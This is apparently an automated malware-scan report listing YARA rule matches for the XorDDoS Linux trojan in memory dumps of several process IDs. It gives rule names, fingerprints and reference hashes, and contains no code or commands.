Source: 6508.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6508.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6464.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6464.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6464.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6464.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6464.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6464.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6241.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6241.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6241.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6241.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6241.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6241.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6529.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6529.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6529.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6529.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6529.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6529.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6548.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6548.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6548.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6548.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6548.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6548.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6265.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6265.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6265.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6265.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6265.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6265.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6505.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6505.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6505.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6505.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6505.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6505.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6527.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6527.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6527.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6527.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6527.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6527.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6411.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6411.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6411.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6411.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6411.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6411.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6439.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6439.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6439.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6439.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6439.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6439.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6340.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6340.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6340.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6340.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6340.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6340.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6393.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6393.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6393.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6393.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6393.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6393.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6337.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
